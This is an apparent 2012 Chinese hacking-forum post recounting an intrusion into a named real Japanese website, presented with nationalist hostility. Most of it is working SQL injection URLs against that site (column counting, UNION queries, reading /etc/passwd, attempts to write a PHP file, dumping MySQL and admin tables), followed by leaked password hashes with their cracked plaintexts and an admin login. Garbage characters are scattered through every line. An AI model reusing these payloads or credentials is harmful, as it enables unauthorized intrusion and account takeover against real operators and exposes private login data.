找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3133|回复: 1
打印 上一主题 下一主题

原创 检测汉奸站全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-17 16:22:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
补:www.zuaa.jp测试

4 F, T1 f$ P3 B, q) Y
. p2 s4 W# x) r( K$ m3 a0 K* @0x01. 检测 www.zuaa.jp 收集数据4 |4 g  Q, ^$ `" E% e2 Z4 x9 ^
3 T# ~4 T- a; x* _  b

1 S5 _" \( A% o3 T# n  c* wwhatweb! Y. _' G9 G. k6 O/ D1 d

4 m3 S6 I$ A' B& m# U. k8 q) U, A" d$ o8 Q4 m/ p  M' v# s8 i
利用NMAP扫描
! B# {7 y6 a: H2 b2 M, Q
. ]) H# Z" e1 Q2 e. w8 Z中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
# {; n% K/ y" r& \0x02.找注入点
- x6 @. l9 }# R. |1 P5 {找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=3906 o  _7 s/ H$ ?3 J) P+ q* _; N
- p8 q  \( M* i% |* P# H

2 U0 `% }+ ?" @: ?  D0x03.order by- {/ R% d% r9 [1 B
             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1( e7 v0 _7 l4 b5 e6 O/ C! ?
# W* n$ T+ h2 J  p
order by 28报错,order by 27正常
8 L- j6 }* {% a, i" H$ y1 C' n; Y) Y5 H
0x04.   union手动查询& R4 ?: q# H/ i
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
8 _( \  m# a0 o" s, @+ P添加到 27 时正常显示
% d2 k9 I7 Y5 g/ M6 C
$ j1 h5 Q: `, @; F( g7 B中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
: V0 }% ]8 g. G/ h2 E- b/ a6 M; t# e9 C5 {+ H  |% R/ D" n8 W
0x05. info:
7 Y" V' I  C& M+ q% S3 lhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 $ ?" g5 E: ]  Z. A" R% [
7 i& O' Z6 N/ J7 {" |; f9 ~
user:            root@localhost8 p/ D5 A& ]* E0 N9 f9 l, k) e" [
database:    openpne
1 G* K" ]5 S+ [3 tversion:      4.1.22- |0 P+ ]: \7 G; S6 _
os:             portbld-freebsd5.4+ W) |# s+ W7 O! K

& p: W; i& A5 W* T0x06. root用户) y  C8 R5 v! o1 o9 A, |" Z) {
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)
+ `7 d- }3 i* n! L3 [http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 6 W5 x% P6 v" K. q  h
$ b; ]! [3 V2 N0 G" Y: Z9 T3 P8 Q9 d5 W
通过工具转换
, U3 ^! q" @& ?3 Y  P& c0 y, v* ?( b  X, m7 H# \& B2 z2 f# e
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
" T4 w% @+ [5 F# N! _6 P8 |
, q% k( \' P% {8 {0x07. 利用 into outfile
( J& C: |$ }# m  j) _9 U全部都失败' l; c- h2 R2 Z) f
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
3 |2 y' ?2 g& y( ?$ a4 U0 @9 }) b$ d- u0 K
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php + B. P( C& b" R* v$ A
& j  e6 X% b( D' v5 i
页面显示“MDB2 Error:syntax error”
, D1 ~& V  N4 Y! q
+ G4 L0 D) k3 J+ i  S0x08. 利用 mysql 4.1. {* z) U4 k5 y1 x' ^
猜常规表名,字段未果 工具 sqlmap: O6 e6 t3 M3 b" G: N" o
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
' l% K% g. z/ S7 t. {/ k
( w9 {2 l& c; ?9 X: n. Q- a$ G

! q5 B( B* X# p; Q& H0x09. 查找后台: ?: @" C% @) C) G% d; M
利用 现有的各种 后台工具尝试都不行
0 s0 ~0 M* [" H5 U
* m. f3 `: P+ _9 J) C0x10.  MySL外联方法5 W* r( c! P) C0 y# Z3 A
从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行
# c% L% p) \: R8 Z7 a$ D  x可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user: v  z! E+ \4 |% T
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
3 }/ L. Q! s7 j, M7 G) `# A! P% C" t) u
这个可以在 www.cmd5.com 解密
0 H& w% m$ W- A1 m6 groot:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa20091 t: P! Q- [9 K# S$ Y+ b
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97" K# {8 m) ?3 I0 ?: w. D
openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
3 y7 ?+ D8 Y2 ]; P0 P# }zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???% V7 _( X. a1 o. x( q
工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知. T: u3 k# r$ {* t7 G! F" t8 J7 g
( o2 }# p1 r0 A, `9 F) O" G9 N

* N! x( e0 H; Y6 T" z0 L5 v0x11. 网站突破6 r" [" O" {2 i, k+ c; |3 A
发现网站的源程序 openpne, google 下载 openpne 源码  G- J4 R7 q( d5 V: I

6 b0 C0 V. X7 ^+ X2 Z: c; ^9 T/ ^" W
0x12. 默认信息利用" _! m: X3 [' d7 l0 U! b6 T
http://sns.zuaa.jp/?m=admin&a=page_login
1 s1 k/ `2 V- m- U% a- o
/ U3 ^+ ]/ K; `表名 (c_admin_user) ,字段名(username,password)
4 X6 [5 I5 k: h$ B4 V3 `- _http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
0 p: }% v5 }2 ?" `. H
; u( M: M1 F8 v$ i$ ?$ ~6 u解密7 _; J3 r! q* D9 J
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
" W, U! U0 j0 o* _0 ~zuaajp:c0923ec5857796a393da99905008c176,          zju1897
7 ~9 g8 c$ H  Y! ]* d% Y  b1 X# D3 Q$ A3 m
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
' y& I  Z' N- h7 c7 E
5 g' E/ i% v4 l; Z1 B" `0 }0x13. 登录后台5 ~, f' o0 @5 U  F# [  P
. j1 R3 W* I3 w; f% v
$ C2 S0 c' L0 m$ L. c
% C! @8 u5 Z# o3 F/ T% s; s) ]
0x14. 小结
& a$ z) w4 s( q, ~利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。
) m) j( J; o+ T感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
. s- t9 F3 y, |( x5 C------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain% ]  E( t& z; Y) B$ G) E  M
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持+ H* K; B, |" ^* z+ d9 G; |; W

+ h- Z) U( Z, I1 b7 G最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!% }" i$ L. V% G6 z7 |9 v

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2012-9-19 08:27:03 | 只看该作者
哪个牛人 费的这劲 入侵的
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表